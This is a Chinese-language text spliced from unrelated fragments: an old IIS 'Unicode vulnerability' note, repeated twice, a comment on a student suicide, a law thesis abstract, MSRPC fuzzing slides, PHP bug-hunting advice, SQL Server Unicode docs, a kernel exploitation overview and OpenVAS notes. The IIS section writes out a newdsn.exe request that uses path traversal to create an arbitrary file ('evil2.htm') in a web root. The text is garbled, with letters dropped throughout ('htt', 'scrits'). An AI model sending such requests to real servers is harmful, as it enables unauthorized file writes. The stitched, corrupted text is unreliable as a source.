防范unicode漏洞

UNICODE漏洞一

UNICODE 漏洞

☆发现/scrits/tools/newdsn.exe漏洞

newdsn.exe :一个存在于/scrits/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。 1

．

创

建

文

件

：

htt://xxx.xxx.xxx.xxx/scrits/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&am;dsn=Evil2+samles+from+microsoft&am;dbq=../../root/evil2.htm&am;newdb=CREATE_DB&am;attr=

☆发现/_vti_bin/shtml.dll漏洞

shtml.dll在Frontage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地径信息. 但是如果我们请求并非HTML、SHTML或者AS后缀的文件我们将会得到不同的信息. htt://TrustedServer如果用户上述指定的链接脚本将通过HTT请求从客户端传送给可信

UNICODE漏洞一

UNICODE 漏洞

☆发现/scrits/tools/newdsn.exe漏洞

newdsn.exe :一个存在于/scrits/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。 1

．

创

建

文

件

：

htt://xxx.xxx.xxx.xxx/scrits/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&am;dsn=Evil2+samles+from+microsoft&am;dbq=../../root/evil2.htm&am;newdb=CREATE_DB&am;attr=

☆发现/_vti_bin/shtml.dll漏洞

shtml.dll在Frontage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地径信息. 但是如果我们请求并非HTML、SHTML或者AS后缀的文件我们将会得到不同的信息. htt://TrustedServer如果用户上述指定的链接脚本将通过HTT请求从客户端传送给可信

无人愿同桌，优等生烧奖状跳楼，这位学生的做法有点过头了，往往是因为一些小事，一时脑子一热就拿自己的生命付出代价，钱没了可以再挣，朋友没了可以再找，但是生命一旦失去就再也没有了，正是由于他脑子一热，付出了生命的代价，父母将失去孩子，老师将失去学生，同学将失去朋友，这些你都想过没有。学校如果开设心理辅导课估计会好一些，事已至此，最后，祝那位同学一路走好。

论法律漏洞的填补

课程： 法律方法论 指导教师：陈金钊教授

姓名： 2009级诉讼法学研究生 扈斌

论法律漏洞的填补

扈 斌

摘 要：在司法实践中，只要存在法律体系，就会存在法律漏洞。为了实现法律的公平和正义，司法者应该运用智慧在司法实践中对法律漏洞进行填补。本文通过对法律漏洞的内涵进行分析，并结合相关理论对法律漏洞的填补技术进行探索。

关键词：法律漏洞 法律漏洞的填补 填补技术

在司法实践中，法官的判决会影响到当事人一生的命运与幸福。当事人之所以在权利受到侵害时，愿意求救于法律，接受法院的裁决，主要是基于对法官依法审判的信仰。如果法官可以不依法审判，则人民守法的动机将荡然无存，和谐的社会秩序也必将受到侵害。因此，在某种程度上说，公正审判的核心就是法官依法审判，使公民能稳定的遵守法律的预期。

但是，法官若要在一切案件中都能严格依法判决，必须存在一个前提：即现有法律体系必须极端完善，几乎涵盖社会生活的全部；这样法官在审理案件时，只需要套用法律即可。显然，任何一个法律人都清楚，这样一个没有任何法律漏洞的法律体系是不存在的。法律必然存在漏洞。因为，即使再谨慎制定的法律，也不能对属于法律调整范围的所

MSRPC Fuzzing with SPIKE 2006

Dave Aitel

d41444d184254b35eefd341f

概览

?Fuzzing 简介

?MSRPC快速简介和相关协议?MSRPC fuzzing的历史和这些技术的缺点?Immunity‘s专注于MSRPC fuzzing ?MSRPC的未来(and hence, of MSRPC fuzzing)

什么是Fuzzing?

?我们所有人都从把小字符串变成大字符串中获益

?Fuzzing所做的就是通过特殊的方法来对应用程序进行输入

–主要的好处: 没有误报. 你通过fuzzing找到

的所有bug都是可重现的(虽然它可能无法利用)

–主要的麻烦: 速度很慢

为什么要fuzz?

?即便有安全公告或二进制比较工具，相对逆向工程而言，fuzzing更容易找到bug

?Fuzzing能找出通过二进制或源代码分析难以发现的bug

?A generalized fuzzer for a bug will tell you if a patch is good enough to cover edge cases or if it has an edge case that is still vulnerable

比如学习PHP漏洞挖掘：

比如学习PHP漏洞挖掘：
先掌握php基本语法，常用php函数，对常用的php函数写一些demo。然后开始看以前php应用漏洞分析的文章，开始的一些基本漏洞比如简单的纯get，post没有intval或者强制转换造成的sql注入，比如没有htmlspecialchar造成的简单xss。看这些基本的东西我们之前打的底子就完全够用了。

然后我们看一些较高级漏洞的利用，比如各种变量覆盖漏洞，比如unserialize造成的代码执行，我们开始看的时候可能会觉得吃力。那就需要回过头去先看看extract等函数具体用法，for each对$_REQUEST进行变量生成的过程是怎样的，unserialize函数的执行流程是怎样的。然后再去看之前的技术文章就会豁然开朗了。这只是基本的php漏洞挖掘，熟练了之后尝试着去看一些框架的漏洞分析，比如thinkphp
，这些又涉及到OOP的相关知识，那么再回过头去学习PHP OOP编程，然后再继续。如此循环下来，边学习漏洞挖掘边学习编程，这样的效率和效果都要比先单纯的啃编程书要强很多。这也是国内外技术人员做研究的一大差异，国内喜欢先学习理论基础，而国外注重先应用，应用的过程中遇到困难再去学习理论基础

SQL Server 2005 中的 Unicode 支持

Unicode 支持是 SQL Server 2005 中多语言支持的基础。Unicode 是由 Unicode Consortium(一个提倡为所有语言使用单一字符集的组织)创立的一项标准。SQL Server 2005 支持 Unicode 标准 3.2 版。Unicode 标准的 3.01 版与 ISO-10646(一项与 Unicode 中的所有码位均相符的国际标准)完全相同。

Unicode 的工作方式是，为每个字符提供一个唯一的码位，该码位与平台、程序或语言无关。支持 Unicode 的程序可以处理任何语言的数据。因为其设计宗旨是涵盖世界上所有语言的所有字符，所以不需要让不同的代码页来处理不同的字符集。 因为所有 Unicode 系统都统一使用相同的位模式来表示所有字符，所以从一个系统转到另一个系统时，不会出现字符转换不正确的问题。

管理国际数据库中的字符数据的最简单方法是始终使用 Unicode nchar、nvarchar 和 nvarchar(max) 数据类型，而不使用它们对应的非 Unicode 数据类型：char、varchar 和 text。这样，客户端与所有

系统内核漏洞利用迁移技术

自黑客的攻击方向开始瞄向操作系统开始，内核安全性问题日益凸显出它的重要性。攻击兴趣的主要助推器还是因为现代操作系统内核的特性所决定。系统内核包含许多子系统模块的实现代码，子系统之间通过复杂的接口交互；另外，系统内核还包含大量的用户数据接入点，如系统调用、IOCTLs、文件系统及网络连接等，允许可控的用户数据成功 访问到内核中的重要代码区，这些都是可能被黑客利用的漏洞，从而形成各种系统BUG。本文是在参考Patroklos在bh-eu-2011上发表的文章“Protecting the Core-Kernel Exploitation Mitigation”、 Adam 在Phrack-67上发表的文章“Scraps of notes on remote stack overflow exploitation”以及Tarjei Mandt在bh-dc-2011上发表的文章“Kernel Pool Exploitation on Windows 7”的基础上并结合自己的理解分析完成的，主要分析Linux与Windows系统上可能存在的各种漏洞利用及其迁移保护技术。 1. 内核内存污染漏洞

NULL指针解引用是最常见的漏洞

构建OpenVAS 4漏洞评估系统

构建OpenVAS 4漏洞评估系统

2011.05.17 TsengYia# /

—— 附注：OpenVAS（Open Vulnerability Assessment System）是一套开源的漏洞/弱点扫描系统，可以强力替代著名的Nessus漏洞检测系统（已经非开源）。OpenVAS集成了多个服务、组件，既提供大量的免费扫描插件（NVT，Network Vulnerability Tests），也提供商业化的增强扫描插件（GSF，Greenbone Security Feed）。

#################################################################

系统环境：

服务器 —— RHEL 5.5 [2.6.18-194.el5]

客户机 —— Microsoft Windows 7

OpenVAS的工作结构：

图1，OpenVAS4-Structure.png 各程序组件的协作关系

查看全文

漏洞扫描

漏洞（或计算机漏洞）是指在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。具体举例来说，比如在 Intel Pentium芯片中存在的逻辑错误，在Sendmail早期版本中的编程错误，在NFS协议中认证方式上的弱点，在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用，威胁到系统的安全。因而这些都可以认为是系统中存在的安全漏洞，这些漏洞存在于各个方面，而且数量惊人。据卡巴斯基实验室的统计显示：仅2010年第三季度，就检测出用户计算机中的漏洞程序和文件数量约3200万个。

计算机漏洞是一个比较独特的抽象概念，它具有以下特点：

1．计算机安全漏洞的存在并不能导致损害，但是它可以被攻击者利用，从而造成对系统安全的威胁和破坏。计算机安全漏洞也不同于一般的计算机故障，漏洞的恶意利用能够影响人们的工作、生活，甚至会带来灾难的后果。

2．漏洞是普遍存在的，例如，软件编程过程中出现逻辑错误是很普遍的现象，而这些错误绝大多数都是由疏忽造成的。

3．漏洞是在硬件、软件、协议的具体实现或具体使用的过程中产生的错误，但并不是系统中存在的错误都是安全漏洞，只有能威胁到系统安全的错误